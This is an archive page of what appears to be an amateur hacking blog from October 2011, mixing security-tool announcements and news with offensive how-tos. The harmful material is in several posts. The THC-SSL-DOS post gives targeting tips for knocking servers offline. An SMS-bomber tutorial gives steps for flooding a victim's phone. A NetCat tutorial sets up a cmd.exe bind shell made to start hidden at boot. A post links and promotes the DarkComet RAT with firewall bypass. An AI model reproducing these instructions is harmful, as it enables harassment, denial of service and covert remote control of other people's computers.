Home / Archives for October 2011

THC-SSL-DOS | tool to verify the performance of SSL.

Posted by Deepanker Verma Sunday, October 30, 2011 0 comments

THC-SSL-DOS is a tool to verify the performance of SSL. Establishing a secure SSL connection requires 15x more processing power on the server than on the client. THC-SSL-DOS exploits this asymmetric property by overloading the server and knocking it off the Internet. This problem affects all SSL implementations today. The vendors are aware of this problem since 2003 and the topic has been widely discussed.

This attack further exploits the SSL secure Renegotiation feature to trigger thousands of renegotiations via single TCP connection.

A traditional flood DDoS attack cannot be mounted from a single DSL connection. This is because the bandwidth of a server is far superior to the bandwidth of a DSL connection: A DSL connection is not an equal opponent to challenge the bandwidth of a server.

This is turned upside down for THC-SSL-DOS: The processing capacity for SSL handshakes is far superior at the client side: A laptop on a DSL connection can challenge a server on a 30Gbit link. Traditional DDoS attacks based on flooding are sub optimal: Servers are prepared to handle large amount of traffic and clients are constantly sending requests to the server even when not under attack.

The SSL-handshake is only done at the beginning of a secure session and only if security is required. Servers are _not_ prepared to handle large amount of SSL Handshakes. The worst attack scenario is an SSL-Exhaustion attack mounted from thousands of clients (SSL-DDoS).

Tips & Tricks for Whitehats

The average server can do 300 handshakes per second. This would require 10-25% of your laptops CPU.
Use multiple hosts (SSL-DOS) if an SSL Accelerator is used.
Be smart in target acquisition: The HTTPS Port (443) is not always the best choice. Other SSL enabled ports are more unlikely to use an SSL Accelerator (like the POP3S, SMTPS, … or the secure database port).
Counter measurements

No real solutions exists. The following steps can mitigate (but not solve) the problem:

Disable SSL-Renegotiation
Invest into SSL Accelerator
Either of these countermeasures can be circumventing by modifying THC-SSL-DOS. A better solution is desireable. Somebody should fix this.

Source:
http://www.thc.org/thc-ssl-dos/

Download here:
Windows: http://www.thc.org/thc-ssl-dos/thc-ssl-dos-1.4-win-bin.zip
Linux: http://www.thc.org/thc-ssl-dos/thc-ssl-dos-1.4.tar.gz

Tor 0.2.2.34 Released with fixes of anonymity vulnerability

Posted by Deepanker Verma Friday, October 28, 2011 0 comments

Tor 0.2.2.34 Released with fixes of anonymity vulnerability

Tor 0.2.2.34 fixes a critical anonymity vulnerability where an attacker can de-anonymize Tor users. Everybody should upgrade. Clients should upgrade so they are no longer recognizable by the TLS certs they present. Relays should upgrade so they no longer allow a remote attacker to probe them to test whether unpatched clients are currently connected to them.This release also fixes several vulnerabilities that allow an attacker to enumerate bridge relays. Some bridge enumeration attacks still remain.

Download Here:
https://torproject.org/download/download-easy

DEFT Linux v.6.1.1 Released | Computer Forensic Live Cd

Posted by Deepanker Verma 0 comments

DEFT Linux 6 is based on the new Kernel 2.6.35 (Linux side) and the DEFT Extra 3.0 (Computer Forensic GUI) with the best freeware Windows Computer Forensic tools. DEFT it’s a new concept of Computer Forensic live system that use LXDE as desktop environment and WINE for execute Windows tools under Linux and mount manager as tool for device management. It is a very easy to use system that includes an excellent hardware detection and the best free and open source applications dedicated to incident response and computer forensics.

DEFT is meant to be used by: police ,investigators ,system administrator, individuals and all the people who need to use forensic tool but don’t know the open source operative systems and the Forensic techniques.

Download here:
http://www.deftlinux.net/download/

MOVAVI Video converter - all in one video converter and editing tool

Posted by Deepanker Verma 0 comments

Video converter is a must have tool for our computer. We all need this tool for conversion of video, audio and image files from one format into another format easily. MOVAVI video converter is a perferct video converter for all type of music conversion.It supports more than 170 video audio, and image formats including AVI, MPEG, MP4, WMV, ASF, 3GP, 3GPP, MKV, MP3 MOV, QT, VOB, IFO, MOD, DAT, M2T, MTS, VRO, FLV, etc. I do not think You are going to use any type of media format which it can not support. it can also convert to and from high definition video formats. Now you can easily use any of your media files as you want. Change the format as your need with this tool.

If you are going to convert any media for your mobile devices, then you must know that it supports 200+ mobile device including iPad, iPod, iPhone, PSP, Nokia, BlackBerry, Android, Sumsung, etc.

features you will get in the latest version

New speed records: It is the fastest video converter with 8 times faster than any normal video converter tool.

If you have a video file with many audio or video tracks, you can select which you want in your converted files with the format you want.

Audio track selection for MKV, AVI, MP4, MPEG, and WMV. It also makes uploading to YouTube and Facebook easy.

ip your favorite movie in AVI or other format easily. It features quality lossless transference of multichannel audio from DVD when you rip video and convert to AVI format.

User can easily customize output file size and format.

With this nice video converter, user also get an editing tool for basic editing tasks like crop, rotate, watermark, enhance video quality, adjust the brightness/contrast, use artistic effects, apply professional filters. You can also cut the video in parts if you need.

Most of the video converter i have seen are too slow and takes much time. But MOVAVi converter is optimized for NVIDIA CUDA which giove you 8 times faster speed.

Movavi Video Converter is being used by millions of satisfied users with some high profile companies as clients including Microsoft, Procter & Gamble, Coca-Cola, Harvard University.

FOCA v.3.0 Free Released

Posted by Deepanker Verma 0 comments

FOCA v.3.0 Free Released

This new version has new fresh look and feel, and it is full of new features that you will love to discover. If you want to learn more about FOCA, and Get FOCA 3 PRO, then you can book for a seat in the next online training about FOCA. It is going to be delivered on 4th of November in English and on 8th of November in Spanish. Both of them delivered by our FOCA father Chema Alonso.

In FOCA 3 PRO you will discover features focused in discovering vulnerabilities in web sites, which are completely new. If you booked for an online seminar about FOCA PRO in 2011 then you can get a seat with 50% OFF.

Download Here:
http://www.informatica64.com/descargas/Foca_Free_3_0_20111027.zip

create your own online free sms bomber with firefox

Posted by Deepanker Verma Monday, October 24, 2011 1 comments

hello readers this is my first post on the www.hackingtricks.in.today i will teach you about how to create your personal sms bomber and flood victim's mobile with lots of sms's.you can create your personal sms bomber in just 8 easy steps-
1.first of all you need moziilla firefox browser download and install it.
https://addons.mozilla.org/en-US/firefox/addon/imacros-for-firefox/
2.after installing mozilla go on add-on market of firefox and search for add-on named as imacros.
3.install imacros on mozilla.
4.search for any free sms sending website which not gives captcha challenge.
5.open website in firefox and press F8 imacros will open.
6.after opening imacros click on record and then type your message and and victim's mobile number and after typing message and mobile
7.after that click on play and give maximum value to 500 and click on play loop.
8.you have done now go and take rest(ha ha).

for step 4 do some googling you will find a lot of sites.

yogesh awasthi is 17 year old boy lives in raebareli having very much interest in ethical hacking. He also write tricks on blog http://www.technway.co.cc/

Microsoft official YouTube channel hacked

Posted by Deepanker Verma Sunday, October 23, 2011 0 comments

Microsoft official YouTube channel hacked

Official YouTube channel of the software giant Microsoft has been hacked and all the previous videos and ads have been removed. This channel has already more than 24,000 subscribers.
Hackers have also posted 4 videos on the channel and a message on the channel read , “I DID NOTHING WRONG I SIMPLY SIGNED INTO MY ACCOUNT THAT I MADE IN 2006 :/

How to make a website for free

Posted by Deepanker Verma Saturday, October 22, 2011 1 comments

As the advancement in technology and popularity of tablets, every one use internet for all the things. So your business must have an online identity to reach the potential customers. As an individual, every one wants a website of his own. But, how to create a website? This is the main problem for all the persons who do not know computer languages.

But it is not necessary to have technical and coding knowledge for creating a website. And you can have a website for free without knowing anything how the things work.

UCoZ web service is an online service which helps people to create a free website with an easy to use website builder. It also gives a domain name for your website without charging anything. You will have website just in 10 minutes with a great look. It provides many pre-designed templates for great look and you can also customize your website's look.

These are some main features which this service provides

Unlimited free disk space
One free domain
Backup
Content management system
Template based design
Development of API
Extension in website functions with PHP MYSQL support
It blocks spam visitors and block activity based on IP.

Ucoz also provide some build in Modules to use with your website. And the company regularly updates these modules to enhance performance

Forum (Bulletin Board)

E-shop
Site News
Blog (Web Journal)
Publisher (Article Catalog)
File Catalog
Site Catalog
Tag Board (Mini Chat)
Ad Board
Photo Albums
Online games
Web Polls
Guestbook
FAQ Service
E-mail Forms
Page Editor
Statistics (Hit Counter)
Site Search
User Management
Tests
Awards

You can use any of the given modules in your website to improve your functions of your website.

After all these things, one thing is sure. You will never get all these features for free in any other service. So if you are thinking to create your website, you can give this a try. Register and create a website for free

Metasploit Community Edition v.4.1

Posted by Deepanker Verma Friday, October 21, 2011 0 comments

The user interface is based on the Metasploit Pro workflow and the introduction of the Analysis tab in 4.1 makes slicing and dicing large networks even easier. Just like Metasploit Pro, the free Community Edition provides a simple path for identifying targets, selecting an exploit, and launching it. Sessions can be managed through the user interface and have full access to the extensive post-exploit modules built into the Metasploit Framework. Although Metasploit Community Edition isn't a replacement for Metasploit Pro by any means, its easy to use and leverages the quality-assured code base managed by the Rapid7 team.
;
SOURCE: https://community.rapid7.com/community/metasploit/blog

download here:
http://metasploit.com/download/

How to install backtrack5 on virtual machine

Posted by Deepanker Verma Saturday, October 15, 2011 0 comments

You can install backtrack 5 on your system in many ways. You can install it on your system as primary OS. You can also install it as virtual machine on your windows and you can also install it as dual with some other operating system as windows.
The best way as a learner is to use backtrack as a virtual machine on your system. In this way you can use it easily with your windows.

In this tutorial i will show you how to setup backtrack as a virtual machine on your system.

First of all download the backtrack5 from the website
http://www.backtrack-linux.org/downloads/

Then download VMware workstation
http://downloads.vmware.com/

Install VMware workstation on your system and create a new Virtual machine.

select custom (advanced)

Choose the Virtual Machine Hardware Compatibility.
Just click on Next for defaults.
Now select the installer disk image and browse the backtrack image.

Now it will ask the guest operating system. Select Linux, then choose Other Linux 2.6.x kernel as the version.
Give a name to your virtual machine
In memroy config, set the memory for your virtual machine. i will recommend 512 MB.
In network type choose NAT
Then Select SCSI adapter type and Choose LSI Logic
Set Maximum disk size.
I recommend you to select 10GB or above
Choose Store virutal disk as a single file.
Specify disk file and Just click next.

Now backtrack should be loading and booting

After loading type startex to go to GUI mode.

Now run install backtrack.

inSSIDer- WiFi Network Scanner tool

Posted by Deepanker Verma Friday, October 14, 2011 0 comments

Wireless network in short Wi-Fi network security is the main problem of different organizations and institutes. Most of the criminal activities are done by hacking these insecure networks.
So network admins should try to secure their networks by proper testing. i am going to write about a nice tool inSSider which is FREE, open-source Wi-Fi scanning software It is an open source tools that previously available for Windows like OS only but now it is available for Linux too. It is a best alternative of Netstumbler.
features

Compatible with Windows XP, Vista and 7 (32 and 64-bit)
Uses the Native Wi-Fi API and your current Wireless network card
Sort results by MAC Address, SSID, Channel, RSSI and "Time Last Seen"
Compatible with most GPS devices (NMEA v2.3 and higher)

How can inSSIDer do?

Inspect your WLAN and surrounding networks to troubleshoot competing access points
Track the strength of received signal in dBm over time
Filter access points in an easy-to-use format
Highlight access points for areas with high Wi-Fi concentration
Export Wi-Fi and GPS data to a KML file to view in Google Earth.
Filter through hundreds of scanned access points

Download: http://www.metageek.net/products/inssider/

RootRepeal-Rootkit Detector Tool

Posted by Deepanker Verma Thursday, October 13, 2011 0 comments

RootRepeal-Rootkit Detector Tool

rootkits are the malicious tools which create backdoors and allows attacker to maintain access to the victim computer. It hide itself and hard to detect. There are many tools available to detect and remove rootkits.
Rootrepeal is also a nice tool which detects all type of rootkits.

RootRepeal includes the following features:

Driver Scan - scans the system for kernel-mode drivers. Displays all drivers currently loaded, and shows if a driver has been hidden, and whether the driver's file is visible on-disk.
Files Scan - scans any fixed drive on the system for hidden, locked or falsified* files.
Processes Scan - scans the system for processes. Displays all processes currently running, and shows if a processes is hidden or locked.
SSDT Scan - shows whether any of the functions in the System Service Descriptor Table (SSDT) are hooked.
Stealth Objects Scan - attempts to determine if any rootkits are active by looking for typical symptoms.
Hidden Services Scan - scans for hidden system services.
Shadow SSDT Scan - counterpart to the SSDT Scan, but deals mostly with graphics and window-related functions.

Download Here: http://ad13.geekstogo.com/RootRepeal.rar

Microsoft launches new tool,"YourBrowserMatters" to check your browsers security

Posted by Deepanker Verma Wednesday, October 12, 2011 1 comments

Microsoft launches new tool,"YourBrowserMatters" to check your browsers security

Microsoft has announced a new tool that will help users to know more about their web browser and its security features. This new tools aims to show users how secure their browser is and how they can improve their security.
On the visit of the website, it detects the visitors web browser and returns a browser security score on a scale of 4 points.
When i tested the tool, it shows 2-2.5 points for mozilla and chrome browsers and full points for IE9. i think little biased. It shows 1 pint for IE7 ad no points for IE6. This web tool refused to test safari web browser.

German scientists cracked Smartcard Encryption

Posted by Deepanker Verma Tuesday, October 11, 2011 0 comments

Security researchers from Ruhr University in Germany cracked the encryption that protects the chip cards. It was recently unbreakable but now it is possible to break.
The equipment required for the operation costs around $3,000 which is very less for some who want to do a big damage.
This attack recovered the card's secret key, allowing an adversary to assume the digital identity of individuals who use it to prove they are who they say they are.
"It provides a recipe for how to extract the secret key material non-invasively, basically by pointing a radio probe at the card and monitoring it as it performs a transaction. This is something that's easily replicable with a few thousand dollars and a little amount of time, so it's practical," said cryptographer Nate Lawson, the principal of Root Labs, who has read the research.
Read more here

wireless authentication- WEP and WPA Authentication

Posted by Deepanker Verma Thursday, October 6, 2011 0 comments

There are 2 types of methods used for authentication in wireless LAN client on an access point.

Open system
Shared key authentication

Open system do not have any security mechanism. It is a request to make a connection to the network.
Unlike Open system, shared key authentication has the wireless client hash a string of challenge text with the WEP key to authenticate to the network. WEP is used to encrypt the data on WLAN. WEP uses an RC4 64-bit or 128-bit encryption key to encrypt the layer 2 data payload. This WEP key comprises a 40-bit or 104-bit user-defined key combined with a 24-bit Initialization Vector (IV), making the WEP key either 64- or 128-bit.
The process by which RC4 uses IVs is the real weakness of WEP: It allows a hacker to crack the WEP key. The method, knows as the FMS attack, uses encrypted output bytes to determine the most probable key bytes. Hacker can also crack WEP using bruteforce attack.

WPA is safer than WEP which employs the Temporal Key Integrity Protocol (TKIP). There are 2 types of WPA, WPA Personal and WPA Enterprise.
WPA Personal uses an ASCII passphrase for authentication while WPA Enterprise uses
a RADIUS server to authenticate users. WPA Enterprise is a more secure robust security option
but relies on the creation and more complex setup of a RADIUS server. TKIP rotates the data encryption key to prevent the vulnerabilities of WEP and, consequently, cracking attacks. WPA2 is similar to 802.11i and uses the Advanced Encryption Standard (AES) to encrypt the data payload. AES is considered an uncrackable encryption algorithm. WPA2 also allows for the use of TKIP during a transitional period called mixed mode security. This transitional mode means both TKIP and AES can be used to encrypt data. AES requires a faster processor, which means low-end devices like PDAs may only support TKIP. WPA Personal and WPA2 Personal use a passphrase to authentication WLAN clients. WPA Enterprise and WPA2 Enterprise authenticate WLAN users via a RADIUS server using the 802.1X/Extensible Authentication Protocol (EAP) standards.

Reference Sybex CEH official

NetCat tutorial

Posted by Deepanker Verma Wednesday, October 5, 2011 0 comments

NetCat tutorial

Netcat is a utility that is able to write and read data across TCP and UDP network connections. This is available for both windows and linux platforms. Netcat can be used as port scanner, a backdoor, a port redirector, a port listener and lots of other cool things too.
In this tutorial i will write hw you can backdoor with this utility.
First of all make sure netcat is installed in both target computer and in attacking computer.

Given commands are for windows.
Open up a cmd in target computer and and go to the directory where nc.exe is installed.
Then type "nc -L -p 10002 -d -e cmd.exe"

Here's what that command does:
nc - tells Windows to run the nc.exe file with the following arguments:
-L Tells netcat to not close and wait for connections
-p Specifies a port to listen for a connection on
-d Tells Netcat to detach from the process we want it to run.
-e Tells what program to run once the port is connected to (cmd.exe)

This will open up a port on 10002 for you to connect from attacking system

Now go to the attacking system and type
nc 192.168.1.1 10002
in command promt.this will connect you to your "target's" computer.

Here the problem is to start the netcat in the target system because you can go to target system each time to execute that command. FOr this create and batch file with the command "nc -L -p 10002 -d -e cmd.exe" and then place it to the c drive. Download the program cmdow.exe. Make a batch file and name it hide.bat. Inside the file type "cmdow /RUN /HID C:\start.bat". Place this file inside the startup folder.
Now everytime the computer boots netcat will start hidden.

For better understanding read this
http://www.ol-service.com/sikurezza/doc/netcat_eng.pdf

Download Exploit Pack - An open source security framework

Posted by Deepanker Verma 0 comments

Download Exploit Pack - An open source security framework

Exploit Pack is an open source security framework developed by Juan Sacco. It combines the benefits of a Java GUI, Python as Engine and well-known exploits on the wild. It has an IDE to make the task of developing new exploits easier, instant search features and XML-based modules.

A GPL license for the entire project helps to ensure the code will remain free. It also features a ranking system for contributors, tutorials for everyone who wants to learn how to create new exploits and a community to call for help.

It has a module editor that allows you to create your own custom exploits.
There is an instant search feature built-in on the GUI for easier access to modules.
Modules use XML DOM, so they are really easy to modify.
It uses Python as its Engine because the language is more widely used on security related programming.
A tutorial is also provided. If you want to earn money, they will pay you for each module you add to Exploit Pack.

Download Here:
http://exploitpack.com/download-framework

Download DarkComet-RAT v4.2 fwb (Firewall bypass)

Posted by Deepanker Verma Tuesday, October 4, 2011 0 comments

Download DarkComet-RAT v4.2 fwb (Firewall bypass)

This version of DarkComet is firewall bypass. It will inject to web browsers and bypass firewall rules.
Targets are in this order : Firefox, Opera, Chrome, Safari, Internet Explorer and Explorer if all fails (normally never) then it runs normally. Notice now you can use remote computers as SOCKS5 proxies

Download Here:
http://www.darkcomet-rat.com/process_download.php?id=6

How to protect your website from all hacking attempts

Posted by Deepanker Verma Monday, October 3, 2011 1 comments

How to protect your website from all hacking attempts

Now a days hackers are in search of single chance for hack your website. SO having a website which is vulnerable to hackers can be a great loss to you. Most of the web developers also do not know how to protect websites fro the hackers. This is the main reason why websites are hacked.
If you do not know how to protct your website from the hackers. You do not need to think more. Just uses this software and be safe.
This can protect your website from these attacks

SQL Injection Blocker
Block RFI / LFI
HTML/PHP Injection Block
Web Frame DDOS Blocker
BLock Code Injection
Block Path Finder
Block Data Transfersal
Malicious Code Blocker
Erorr Page Redirect
XSS Attack Blocker
MD5 Checksum
SHELL / Backdoor Detector
Sanatize Support
Site Offline Manager
Bandwith Stealer Blocker

Download Here:
Click Here!

How to repair windows Firewall

Posted by Deepanker Verma Sunday, October 2, 2011 0 comments

When the system firewall gets corrupted, it does not work as expected. This cool software to repair your windows firewall. The firewall is built into the system rather deep. And when the firewall becomes corrupt it can still block out side connections from coming in. Even when turned off. Also when corrupt you are unable to add any exceptions to the firewall.

Download Here:
http://www.tweaking.com/files/setups/Tweaking.com-RepairWindowsFirewall.exe

Hacking Tricks

THC-SSL-DOS | tool to verify the performance of SSL.

Tor 0.2.2.34 Released with fixes of anonymity vulnerability

DEFT Linux v.6.1.1 Released | Computer Forensic Live Cd

MOVAVI Video converter - all in one video converter and editing tool

FOCA v.3.0 Free Released

create your own online free sms bomber with firefox

Microsoft official YouTube channel hacked

How to make a website for free

Metasploit Community Edition v.4.1

How to install backtrack5 on virtual machine

inSSIDer- WiFi Network Scanner tool

RootRepeal-Rootkit Detector Tool

Microsoft launches new tool,"YourBrowserMatters" to check your browsers security

German scientists cracked Smartcard Encryption

wireless authentication- WEP and WPA Authentication

NetCat tutorial

Download Exploit Pack - An open source security framework

Download DarkComet-RAT v4.2 fwb (Firewall bypass)

How to protect your website from all hacking attempts

How to repair windows Firewall

Security Tools

Popular Posts

About Me

Partners

Blog Archive